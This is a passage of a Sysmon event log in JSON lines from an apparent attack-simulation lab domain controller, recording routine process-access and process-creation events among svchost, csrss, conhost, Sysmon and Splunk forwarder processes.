C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:41.428","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8378,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:41.428\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:41.428","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8379,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:41.428\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-22CD-5F25-0000-00104A901100}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:41.428","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-22CD-5F25-0000-00104A901100}","TargetProcessId":"4856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8380,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:41.568\r\nSourceProcessGUID: {41C8662E-22CD-5F25-0000-00104A901100}\r\nSourceProcessId: 4856\r\nSourceThreadId: 2764\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:41.568","SourceProcessGUID":"{41C8662E-22CD-5F25-0000-00104A901100}","SourceProcessId":"4856","SourceThreadId":"2764","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8381,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:42.100\r\nProcessGuid: {41C8662E-22CE-5F25-0000-001010921100}\r\nProcessId: 4364\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:07:42.100","ProcessGuid":"{41C8662E-22CE-5F25-0000-001010921100}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:07:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8382,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:42.100\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-22BD-5F25-0000-0010A5061100}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:42.100","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-22BD-5F25-0000-0010A5061100}","TargetProcessId":"4364","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8383,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:42.100\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BD-5F25-0000-0010A5061100}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:42.100","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BD-5F25-0000-0010A5061100}","TargetProcessId":"4364","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8384,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:42.100\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:42.100","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8385,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:42.100\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:42.100","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
